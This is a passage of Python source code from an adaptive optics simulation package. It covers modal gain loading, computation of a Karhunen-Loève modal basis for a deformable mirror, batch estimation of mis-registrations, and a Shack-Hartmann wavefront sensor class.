hdu.writeto(nameFolderIntMat+nameIntMat+'.fits',overwrite=True)
calib = calibrationVault(calib.D@M2C)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*atm.r0)+'_cm_'+param['opticalBand']+'_band_fitting_'+str(param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(M2C.shape[1])
print('No Modal Gains found. All gains set to 1')
ao_calib_object.gOpt = np.diag(1/data_gains)
ao_calib_object.M2C = M2C
ao_calib_object.calib = calib
return ao_calib_object
def get_modal_gains_from_ao_obj(ao_obj, nameFolderIntMat = None):
if nameFolderIntMat is None:
nameFolderIntMat = ao_obj.param['pathInput']+ao_obj.param['name']+'/'
createFolder(nameFolderIntMat)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*ao_obj.atm.r0)+'_cm_'+ao_obj.param['opticalBand']+'_band_fitting_'+str(ao_obj.param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+ao_obj.param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
print('Looking for Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(ao_obj.param['nModes'])
print('No Modal Gains found. All gains set to 1')
gOpt = np.diag(1/data_gains)
return gOpt
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# same function using an ao object as an input
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def get_modal_gains(ngs, tel, atm, dm, wfs, param, nameFolderIntMat = None):
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
if nameFolderIntMat is None:
nameFolderIntMat = param['pathInput']+param['name']+'/'
createFolder(nameFolderIntMat)
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*atm.r0)+'_cm_'+param['opticalBand']+'_band_fitting_'+str(param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(param['nModes'])
print('No Modal Gains found. All gains set to 1')
gOpt = np.diag(1/data_gains)
return gOpt
```
#### File: AO_modules/calibration/compute_KL_modal_basis.py
```python
import numpy as np
from astropy.io import fits as pfits
from AO_modules.tools.tools import createFolder
import AO_modules.calibration.ao_cockpit_psim as aou
def compute_M2C(telescope, atmosphere, deformableMirror, param, nameFolder = None, nameFile = None,remove_piston = False,HHtName = None, baseName = None, SpM_2D = None, nZer = 3, SZ=None, mem_available = None, NDIVL = None, computeSpM = True, ortho_spm = True, computeSB = True, computeKL = True, minimF = False, P2F = None, alpha = None, beta = None, nmo = None, IF_2D = None, IFma = None, returnSB = False, returnHHt = False, extra_name = ''):
"""
- HHtName = None extension for the HHt Covariance file
- baseName = None extension to the filename for basis saving
- SpM_2D = None 2D Specific modes [dim,dim,nspm], if None then automatic
- nZer = 3 number of zernike (PTT,...) for automatic computation
- SZ = None telescope.resolutione of FFts for HHt (By default SZ=2*dim)
- mem_available = None Memory allocated for HHt computation (default is 50GB)
- NDIVL = None Subdiv. of HHt task in ~NDIVL**2. None:-> mem_available
- computeSpM = True Flag to compute Specific modes
- ortho_spm = True Flag to orthonormalize specific modes (QR decomposition)
- computeSB = True Flag to compute the Seed Basis
- computeKL = True Flag to compute the KL basis
- minimF = False Flag to minimize Forces
- P2F = None Stiffness matrix (loaded by default)
- alpha = None Force regularization parameter (expert)
- beta = None Position damping parameter (expert)
- nmo = None Number of modes to compute
- IF_2D = None 2D Influence Functions (only for speeding up)
- IFma = None Serial Influence Functions (only for speeding up)
- returnSB = False Flag to return also the Seed Basis (w/ or w/o KL)
"""
if nmo is None:
nmo=param['nModes']
if deformableMirror.isM4:
initName = 'M2C_M4_'
else:
initName = 'M2C_'
if baseName is not None:
initName = initName + baseName+'_'
if nameFolder is None:
nameFolder = param['pathInput']
createFolder(nameFolder)
if nameFile is None:
try:
nameFile = initName + str(param['resolution'])+'_res'+param['extra']+extra_name
except:
nameFile = initName + str(param['resolution'])+'_res'+extra_name
# the function takes as an input an object with obj.tel, obj.atm,obj.
diameter = telescope.D
r0 = atmosphere.r0
L0 = atmosphere.L0
pupil = telescope.pupil
telescope.isPaired = False # separate from eventual atmosphere
if IF_2D is None:
deformableMirror.coefs = np.eye(deformableMirror.nValidAct) # assign dm coefs to get the cube of IF in OPD
print('COMPUTING TEL*DM...')
print(' ')
telescope*deformableMirror # propagate to get the OPD of the IFS after reflection
print('PREPARING IF_2D...')
print(' ')
IF_2D = np.moveaxis(telescope.OPD,-1,0)
nact = IF_2D.shape[0]
print('Computing Specific Modes ...')
print(' ')
GEO = aou.mkp(telescope.resolution/telescope.resolution*diameter,telescope.resolution,diameter,0.)
if nZer is not None and SpM_2D is None:
SpM_2D = aou.give_zernike(GEO, diameter, nZer)
nspm = nZer
if SpM_2D is not None:
nspm=SpM_2D.shape[2]
if SZ is None:
SZ = int(2*telescope.resolution) ## SZ=1110 for dxo=0.06944 and SZ=1542 for dxo=0.05
print('COMPUTING VON KARMAN 2D PSD...')
print(' ')
PSD_atm , df, pterm = aou.VK_DSP_up(diameter,r0,L0,SZ,telescope.resolution,1,pupil)
#%% ---------- EVALUATE SPLIT OF WORK UPON MEMORY AVAILABLE ----------
#%% ----------COMPUTE HHt COVARIANCE MATRIX (OR LOAD EXISTING ONE) ----------
#pdb.set_trace()
try:
#HHt, PSD_atm, df = aou.load(nameFolder+'HHt_PSD_df_'+HHtName+'_r'+str(r0)+'_SZ'+str(SZ)+'.pkl')
HHt, PSD_atm, df = aou.load(nameFolder+'HHt_PSD_df_'+HHtName+'.pkl')
print('LOADED COV MAT HHt...')
print(' ')
except:
print('COMPUTING COV MAT HHt...')
print(' ')
#pdb.set_trace()
if mem_available is None:
mem_available=100.e9
if NDIVL is None:
mem,NDIVL=aou.estimate_ndivl(SZ,telescope.resolution,nact,mem_available)
if NDIVL == 0:
NDIVL = 1
BLOCKL=nact//NDIVL
REST=nact-BLOCKL*NDIVL
HHt = aou.DO_HHt(IF_2D,PSD_atm,df,pupil,BLOCKL,REST,SZ,0)
try:
aou.save(nameFolder+'HHt_PSD_df_'+HHtName+'.pkl',[HHt, PSD_atm, df])
except:
aou.save(nameFolder+'HHt_PSD_df_'+initName+'r'+str(r0)+'_SZ'+str(SZ)+'.pkl',[HHt, PSD_atm, df])
#%% ----------PRECOMPUTE MOST USED QUANTITIES ----------
if computeSpM == True or computeSB == True or computeKL == True:
## VALID OPD POINTS IN PUPIL
idxpup=np.where(pupil==1)
tpup=len(idxpup[0])
## Matrix of serialized IFs
if IFma is None:
print('SERIALIZING IFs...')
print(' ')
IFma=np.matrix(aou.vectorifyb(IF_2D,idxpup))
## Matrix of serialized Special modes
print('SERIALIZING Specific Modes...')
print(' ')
Tspm=np.matrix(aou.vectorify(SpM_2D,idxpup))
## CROSS-PRODUCT OF IFs
print('COMPUTING IFs CROSS PRODUCT...')
print(' ')
DELTA=IFma.T @ IFma
#%% ----------COMPUTE SPECIFIC MODES BASIS ----------
if minimF == True:
if P2F is None:
P2F=np.float64(pfits.getdata(param['pathInput']+'P2F.fits'))*1.e6 #( in N/m)
P2Ff=np.zeros([nact,nact],dtype=np.float64)
nap=nact//6
for k in range(0,6):
P2Ff[k*nap:(k+1)*nap,k*nap:(k+1)*nap] = P2F.copy()
K=np.asmatrix(P2Ff)
del P2Ff
if alpha is None:
alpha = 1.e-12
if beta is None:
beta=1.e-6
if computeSpM == True and minimF == True:
print('BUILDING FORCE-OPTIMIZED SPECIFIC MODES...')
print(' ')
check=1
amp_check=1.e-6
SpM = aou.build_SpecificBasis_F(Tspm,IFma,DELTA,K,alpha,ortho_spm,check,amp_check)
# SpM_opd = IFma @ SpM
print('CHECKING ORTHONORMALITY OF SPECIFIC MODES...')
print(' ')
DELTA_SpM_opd = SpM.T @ DELTA @ SpM
print('Orthonormality error for SpM = ', np.max(np.abs(DELTA_SpM_opd/tpup-np.eye(nspm))))
if computeSpM == True and minimF == False:
check=1
amp_check=1.e-6
lim=1.e-3
SpM = aou.build_SpecificBasis_C(Tspm,IFma,DELTA,lim,ortho_spm,check,amp_check)
print('CHECKING ORTHONORMALITY OF SPECIFIC MODES...')
print(' ')
DELTA_SpM_opd = SpM.T @ DELTA @ SpM
print('Orthonormality error for SpM = ', np.max(np.abs(DELTA_SpM_opd/tpup-np.eye(nspm))))
#%% ----------COMPUTE SEED BASIS ----------
if computeKL == True:
computeSB = True
if computeSB == True:
#pdb.set_trace()
if minimF == False:
print('BUILDING SEED BASIS ...')
print(' ')
lim=1.e-3
SB = aou.build_SeedBasis_C(IFma, SpM,DELTA,lim)
nSB=SB.shape[1]
DELTA_SB = SB.T @ DELTA @ SB
print('Orthonormality error for '+str(nSB)+' modes of the Seed Basis = ',np.max(np.abs(DELTA_SB[0:nSB,0:nSB]/tpup-np.eye(nSB))))
if minimF == True:
print('BUILDING FORCE OPTIMIZED SEED BASIS ...')
print(' ')
SB = aou.build_SeedBasis_F(IFma, SpM, K, beta)
nSB=SB.shape[1]
DELTA_SB = SB.T @ DELTA @ SB
print('Orthonormality error for '+str(nmo)+' modes of the Seed Basis = ',np.max(np.abs(DELTA_SB[0:nmo,0:nmo]/tpup-np.eye(nmo))))
if computeKL == False:
BASIS=np.asmatrix(np.zeros([nact,nspm+nSB],dtype=np.float64))
BASIS[:,0:nspm] = SpM
BASIS[:,nspm:] = SB
if remove_piston == True:
BASIS = np.asarray(BASIS[:,1:])
print('Piston removed from the modal basis!' )
#%% ----------COMPUTE KL BASIS ----------
if computeKL == True:
check=1
if nmo>SB.shape[1]:
print('WARNING: Number of modes requested too high, taking the maximum value possible!')
nmoKL = SB.shape[1]
else:
nmoKL = nmo
KL=aou.build_KLBasis(HHt,SB,DELTA,nmoKL,check)
#pdb.set_trace()
DELTA_KL = KL.T @ DELTA @ KL
print('Orthonormality error for '+str(nmoKL)+' modes of the KL Basis = ',np.max(np.abs(DELTA_KL[0:nmoKL,0:nmoKL]/tpup-np.eye(nmoKL))))
BASIS=np.asmatrix(np.zeros([nact,nspm+nmoKL],dtype=np.float64))
BASIS[:,0:nspm] = SpM
BASIS[:,nspm:] = KL
if remove_piston == True:
BASIS = np.asarray(BASIS[:,1:])
print('Piston removed from the modal basis!' )
# save output in fits file
hdr=pfits.Header()
hdr['TITLE'] = initName+'_KL' #'M4_KL'
empty_primary = pfits.PrimaryHDU(header=hdr)
## CAREFUL THE CUBE IS SAVED AS A NON SPARSE MATRIX
primary_hdu = pfits.ImageHDU(BASIS)
hdu = pfits.HDUList([empty_primary, primary_hdu])
hdu.writeto(nameFolder+nameFile+'.fits',overwrite=True)
return BASIS
if returnSB == True:
hdr=pfits.Header()
hdr['TITLE'] = initName+'_SB' #'M4_KL'
empty_primary = pfits.PrimaryHDU(header=hdr)
## CAREFUL THE CUBE IS SAVED AS A NON SPARSE MATRIX
primary_hdu = pfits.ImageHDU(BASIS)
hdu = pfits.HDUList([empty_primary, primary_hdu])
hdu.writeto(nameFolder+nameFile+'.fits',overwrite=True)
return BASIS,SB
```
#### File: AO_modules/mis_registration_identification_algorithm/batch_estimate_mis_registrations_modulation.py
```python
"""
Created on Wed Jan 27 12:00:39 2021
@author: cheritie
"""
# commom modules
import jsonpickle
import json
import numpy as np
import copy
# AO modules
from AO_modules.mis_registration_identification_algorithm.estimateMisRegistration import estimateMisRegistration
from AO_modules.mis_registration_identification_algorithm.computeMetaSensitivyMatrix import computeMetaSensitivityMatrix
from AO_modules.calibration.CalibrationVault import calibrationVault
from AO_modules.MisRegistration import MisRegistration
from AO_modules.tools.displayTools import displayPyramidSignals
import matplotlib.pyplot as plt
def batch_estimation_mis_registration(obj, basis, mis_registration_tests, flux_values, amplitude_values, r0_values,name_output, mis_registration_zero = None):
plt.ioff()
# prepare the fields
flux_fields = []
flux_names = []
for i in range(len(flux_values)):
flux_fields.append('nPhotonperSubap_'+str(flux_values[i]))
flux_names.append(' '+str(flux_values[i])+' phot/subap')
amplitude_fields = []
amplitude_names = []
for i in range(len(amplitude_values)):
amplitude_fields.append('amplitude_'+str(amplitude_values[i]))
amplitude_names.append(' Amplitude '+str(amplitude_values[i])+' nm')
r0_fields = []
r0_names = []
for i in range(len(r0_values)):
r0_fields.append('r0_'+str(r0_values[i]))
r0_names.append(' r0 '+str(r0_values[i])+' m')
# zero point and epsilon mis-registration
if mis_registration_zero is None:
misRegistrationZeroPoint = MisRegistration()
else:
misRegistrationZeroPoint = mis_registration_zero
epsilonMisRegistration = MisRegistration()
epsilonMisRegistration.shiftX = np.round(obj.dm.pitch /100,4)
epsilonMisRegistration.shiftY = np.round(obj.dm.pitch /100,4)
epsilonMisRegistration.rotationAngle = np.round(np.rad2deg(np.arctan(epsilonMisRegistration.shiftX)/(obj.tel.D/2)),4)
# location of the sensitivity matrices
nameFolder_sensitivity_matrice = obj.generate_name_location_sensitivity_matrices(obj)
# load sensitiviy matrices (to do it only once)
[metaMatrix,calib_0] = computeMetaSensitivityMatrix(nameFolder = nameFolder_sensitivity_matrice,\
nameSystem = '',\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
pitch = obj.dm.pitch,\
wfs = obj.wfs,\
basis = basis,\
misRegistrationZeroPoint = misRegistrationZeroPoint,\
epsilonMisRegistration = epsilonMisRegistration,\
param = obj.param)
# dictionnaries to store the output
tmp_data_amp = dict()
tmp_data_flux = dict()
tmp_data_r0 = dict()
data_out = dict()
# start
for i_r0 in range(len(r0_values)):
for i_flux in range(len(flux_values)):
for i_amp in range(len(amplitude_values)):
mis_reg_out = np.zeros([3,len(mis_registration_tests.misRegValuesX)])
gamma_out = np.zeros([basis.modes.shape[1],len(mis_registration_tests.misRegValuesX)])
for i_misReg in range(len(mis_registration_tests.misRegValuesX)):
misRegistration_cl = MisRegistration(obj.param)
misRegistration_cl.shiftX = mis_registration_tests.misRegValuesX[i_misReg]*obj.dm.pitch/100
misRegistration_cl.shiftY = mis_registration_tests.misRegValuesY[i_misReg]*obj.dm.pitch/100
misRegistration_cl.rotationAngle = mis_registration_tests.misRegValuesRot[i_misReg]
# location of the data
nameFolder_data= obj.generate_name_location_data(obj,misRegistration_cl)
# name of the files
nameFile = obj.generate_name_data(obj,flux_values[i_flux])
# read the file
try:
with open(nameFolder_data+nameFile+'.json') as f:
C = json.load(f)
output_decoded = jsonpickle.decode(C)
print('file succesfully open!')
# extract the on-sky interaction matrix
print('considering the ' +str(obj.number_push_pull)+' measurements')
print(output_decoded['demodulated_wfs_signal'].shape)
calib_misReg_in = np.squeeze(np.asarray([output_decoded['demodulated_wfs_signal'].T,output_decoded['demodulated_wfs_signal'].T]).T)
displayPyramidSignals(obj.wfs,calib_misReg_in)
displayPyramidSignals(obj.wfs,obj.calib)
plt.show()
print(calib_misReg_in.shape)
# reduce it to the considered modes
calib_misReg = calibrationVault(calib_misReg_in)
print('starting the estimation...')
# estimation script
[mis_reg, gamma, alpha ] = estimateMisRegistration(nameFolder = nameFolder_sensitivity_matrice,\
nameSystem = '',\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
calib_in = calib_misReg,\
wfs = obj.wfs,\
basis = basis,\
misRegistrationZeroPoint = misRegistrationZeroPoint,\
epsilonMisRegistration = epsilonMisRegistration,\
param = obj.param,\
precision = 5,\
sensitivity_matrices = metaMatrix,\
return_all = True,\
fast = False )
gamma = np.asarray(gamma)
alpha = np.asarray(alpha)
# values output
values_out = dict()
values_out['optical_gains_full' ] = gamma
values_out['mis_registrations_full'] = alpha
# storing the convergence value
mis_reg_out[:,i_misReg] = alpha[-1,:]
gamma_out[:,i_misReg] = gamma[-1,:]
# data out
data_out[misRegistration_cl.misRegName] = values_out
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
print('Mis-Registrations identified:')
print(r0_names[i_r0]+'--'+flux_names[i_flux]+'--'+amplitude_names[i_amp])
print('Rotation [deg] \t Shift X [m] \t Shift Y [m]')
print(str(mis_reg_out[0,i_misReg]) + '\t\t' +str(100*(mis_reg_out[1,i_misReg]/obj.dm.pitch))+'\t\t' + str(100*(mis_reg_out[2,i_misReg]/obj.dm.pitch)))
print('Mis-Registrations True:')
print('Rotation [deg] \t Shift X [m] \t Shift Y [m]')
print(str(mis_registration_tests.misRegValuesRot[i_misReg]) + '\t\t'+str(mis_registration_tests.misRegValuesX[i_misReg])+'\t\t' + str(mis_registration_tests.misRegValuesY[i_misReg]))
except:
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
print('ERROR! NO FILE FOUND FOR '+ nameFolder_data+nameFile)
print('skipping...')
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
data_out['mis_registrations'] = mis_reg_out
data_out['optical_gains '] = gamma_out
data_out['misReg_values_rot_out'] = mis_reg_out[0,:]
data_out['misReg_values_x_out'] = 100*(mis_reg_out[1,:]/obj.dm.pitch)
data_out['misReg_values_y_out'] = 100*(mis_reg_out[2,:]/obj.dm.pitch)
tmp_data_amp[amplitude_fields[i_amp]] = copy.deepcopy(data_out)
tmp_data_flux[flux_fields[i_flux]] = copy.deepcopy(tmp_data_amp)
tmp_data_r0[r0_fields[i_r0]] = copy.deepcopy(tmp_data_flux)
out=dict()
out['data_out'] = tmp_data_r0
out['r0_names'] = r0_names
out['amp_names'] = amplitude_names
out['flux_names'] = flux_names
out['r0_fields'] = r0_fields
out['amp_fields'] = amplitude_fields
out['flux_fields'] = flux_fields
out['r0_values'] = r0_values
out['amp_values'] = amplitude_values
out['flux_values'] = flux_values
out['misReg_values_x' ] = mis_registration_tests.misRegValuesX
out['misReg_values_y' ] = mis_registration_tests.misRegValuesY
out['misReg_values_rot'] = mis_registration_tests.misRegValuesRot
output_encoded = jsonpickle.encode(out)
with open(name_output+'.json', 'w') as f:
json.dump(output_encoded, f)
```
#### File: OOPAO/AO_modules/ShackHartmann.py
```python
import numpy as np
import scipy.ndimage as sp
import sys
import inspect
import time
import matplotlib.pyplot as plt
import multiprocessing
from AO_modules.Detector import Detector
from AO_modules.tools.tools import bin_ndarray
import scipy.ndimage as ndimage
try:
from joblib import Parallel, delayed
except:
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
print('WARNING: The joblib module is not installed. This would speed up considerably the operations.')
print('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
import ctypes
try :
mkl_rt = ctypes.CDLL('libmkl_rt.so')
mkl_set_num_threads = mkl_rt.MKL_Set_Num_Threads
mkl_set_num_threads(6)
except:
try:
mkl_rt = ctypes.CDLL('./mkl_rt.dll')
mkl_set_num_threads = mkl_rt.MKL_Set_Num_Threads
mkl_set_num_threads(6)
except:
print('Could not optimize the parallelisation of the code ')
class ShackHartmann:
def __init__(self,nSubap,telescope,lightRatio,threshold_cog = 0,is_geometric = False ):
self.tag = 'shackHartmann'
self.telescope = telescope
self.is_geometric = is_geometric
self.nSubap = nSubap
self.lightRatio = lightRatio
self.pupil = telescope.pupil.astype(float)
self.zero_padding = 2
self.n_pix_subap = self.telescope.resolution// self.nSubap
self.n_pix_lenslet = self.n_pix_subap*self.zero_padding
self.center = self.n_pix_lenslet//2
self.threshold_cog = threshold_cog
self.get_camera_frame_multi = False
self.cam = Detector(round(nSubap*self.n_pix_subap)) # WFS detector object
self.cam.photonNoise = 0
self.cam.readoutNoise = 0 # single lenslet
self.lenslet_frame = np.zeros([self.n_pix_subap*self.zero_padding,self.n_pix_subap*self.zero_padding], dtype =complex)
self.photon_per_subaperture = np.zeros(self.nSubap**2)
# camera frame
self.camera_frame = np.zeros([self.n_pix_subap*(self.nSubap),self.n_pix_subap*(self.nSubap)], dtype =float)
# cube of lenslet zero padded
self.cube = np.zeros([self.nSubap**2,self.n_pix_lenslet,self.n_pix_lenslet])
self.index_x = []
self.index_y = []
# phasor to center spots in the center of the lenslets
[xx,yy] = np.meshgrid(np.linspace(0,self.n_pix_lenslet-1,self.n_pix_lenslet),np.linspace(0,self.n_pix_lenslet-1,self.n_pix_lenslet))
self.phasor = np.exp(-(1j*np.pi*(self.n_pix_lenslet+1)/self.n_pix_lenslet)*(xx+yy))
count=0
# Get subapertures index and fluix per subaperture
for i in range(self.nSubap):
for j in range(self.nSubap):
self.index_x.append(i)
self.index_y.append(j)
mask_amp_SH = np.sqrt(self.telescope.src.fluxMap[i*self.n_pix_subap:(i+1)*self.n_pix_subap,j*self.n_pix_subap:(j+1)*self.n_pix_subap]).astype(float)
# define the cube of lenslet arrays
self.cube[count,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2] = mask_amp_SH
self.photon_per_subaperture[count] = mask_amp_SH.sum()
count+=1
self.index_x = np.asarray(self.index_x)
self.index_y = np.asarray(self.index_y)
print('Selecting valid subapertures based on flux considerations..')
self.photon_per_subaperture_2D = np.reshape(self.photon_per_subaperture,[self.nSubap,self.nSubap])
self.valid_subapertures = np.reshape(self.photon_per_subaperture >= self.lightRatio*np.max(self.photon_per_subaperture), [self.nSubap,self.nSubap])
self.valid_subapertures_1D = np.reshape(self.valid_subapertures,[self.nSubap**2])
[self.validLenslets_x , self.validLenslets_y] = np.where(self.photon_per_subaperture_2D >= self.lightRatio*np.max(self.photon_per_subaperture))
# index of valid slopes X and Y
self.valid_slopes_maps = np.concatenate((self.valid_subapertures,self.valid_subapertures))
# number of valid lenslet
self.nValidSubaperture = int(np.sum(self.valid_subapertures))
self.nSignal = 2*self.nValidSubaperture
# WFS initialization
self.initialize_wfs()
def initialize_wfs(self):
self.isInitialized = False
# reference signal
self.sx0 = np.zeros([self.nSubap,self.nSubap])
self.sy0 = np.zeros([self.nSubap,self.nSubap])
# signal vector
self.sx = np.zeros([self.nSubap,self.nSubap])
self.sy = np.zeros([self.nSubap,self.nSubap])
# signal map
self.SX = np.zeros([self.nSubap,self.nSubap])
self.SY = np.zeros([self.nSubap,self.nSubap])
# flux per subaperture
self.reference_slopes_maps = np.zeros([self.nSubap*2,self.nSubap])
self.slopes_units = 1
print('Acquiring reference slopes..')
self.telescope.resetOPD()
self.sh_measure()
self.reference_slopes_maps[self.valid_slopes_maps] = np.concatenate((self.sx0,self.sy0))[self.valid_slopes_maps]
self.isInitialized = True
print('Done!')
print('Setting slopes units..')
[Tip,Tilt] = np.meshgrid(np.linspace(0,self.telescope.resolution-1,self.telescope.resolution),np.linspace(0,self.telescope.resolution-1,self.telescope.resolution))
Tip = (((Tip/Tip.max())-0.5)*2*np.pi)
mean_slope = np.zeros(5)
amp = 1e-9
for i in range(5):
self.telescope.OPD = self.telescope.pupil*Tip*(i-2)*amp
self.telescope.OPD_no_pupil = Tip*(i-2)*amp
self.sh_measure()
mean_slope[i] = np.mean(self.signal[:self.nSignal//2])
self.p = np.polyfit(np.linspace(-2,2,5)*amp,mean_slope,deg = 1)
self.slopes_units = self.p[0]
print('Done!')
self.telescope.resetOPD()
def centroid(self,im, threshold = 0):
im[im<threshold*im.max()]=0
[x,y] = ndimage.center_of_mass(im.T)
return x,y
#%% DIFFRACTIVE
# single measurement
def lenslet_propagation_diffractive(self,mask,ind_x,ind_y):
support = np.copy(self.lenslet_frame)
lenslet_phase = self.telescope.src.phase[ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap]
support[self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2] = lenslet_phase
norma = mask.shape[0]
ft_em_field_lenslet = (np.fft.fft2((mask*np.exp(1j*support)) * self.phasor))/norma
I = np.abs(ft_em_field_lenslet)**2
I = bin_ndarray(I, [self.n_pix_subap,self.n_pix_subap], operation='sum')
if self.cam.photonNoise!=0:
rs = np.random.RandomState(seed=int(time.time()))
I = rs.poisson(I)
if self.cam.readoutNoise!=0:
I += np.int64(np.round(np.random.randn(I.shape[0],I.shape[1])*self.cam.readoutNoise))
self.camera_frame[ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap] = I
if self.isInitialized:
[x,y] = self.centroid(I,threshold=self.threshold_cog)
self.sx[ind_x,ind_y] = (x-self.sx0[ind_x,ind_y] )
self.sy[ind_x,ind_y] = (y-self.sy0[ind_x,ind_y] )
else:
[x,y] = self.centroid(I,threshold=self.threshold_cog)
self.sx0[ind_x,ind_y] = x
self.sy0[ind_x,ind_y] = y
return I
# multiple measurements
def get_phase_buffer(self,amp,ind_x,ind_y):
support = np.copy(self.lenslet_frame)
support[self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2,self.center - self.n_pix_subap//2:self.center+self.n_pix_subap//2] = np.exp(1j*self.telescope.src.phase[ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap])
return support*amp*self.phasor
def get_lenslet_phase_buffer(self,phase_in):
self.telescope.src.phase = np.squeeze(phase_in)
def joblib_get_phase_buffer():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.get_phase_buffer)(i,j,k) for i,j,k in zip(self.cube[self.valid_subapertures_1D,:,:],self.index_x[self.valid_subapertures_1D],self.index_y[self.valid_subapertures_1D]))
return Q
out = np.asarray(joblib_get_phase_buffer())
return out
def fill_camera_frame(self,ind_x,ind_y,index_frame,I):
self.camera_frame[index_frame,ind_x*self.n_pix_subap:(ind_x+1)*self.n_pix_subap,ind_y*self.n_pix_subap:(ind_y+1)*self.n_pix_subap] = I
def compute_camera_frame_multi(self,maps_intensisty):
self.ind_frame =np.zeros(maps_intensisty.shape[0],dtype=(int))
self.maps_intensisty = maps_intensisty
index_x = np.tile(self.index_x[self.valid_subapertures_1D],self.phase_buffer.shape[0])
index_y = np.tile(self.index_y[self.valid_subapertures_1D],self.phase_buffer.shape[0])
for i in range(self.phase_buffer.shape[0]):
self.ind_frame[i*self.nValidSubaperture:(i+1)*self.nValidSubaperture]=i
def joblib_fill_camera_frame():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.fill_camera_frame)(i,j,k,l) for i,j,k,l in zip(index_x,index_y,self.ind_frame,self.maps_intensisty))
return Q
joblib_fill_camera_frame()
return
#%% GEOMETRIC self
def gradient_2D(self,arr):
res_x = (np.gradient(arr,axis=1)/self.telescope.pixelSize)*self.telescope.pupil
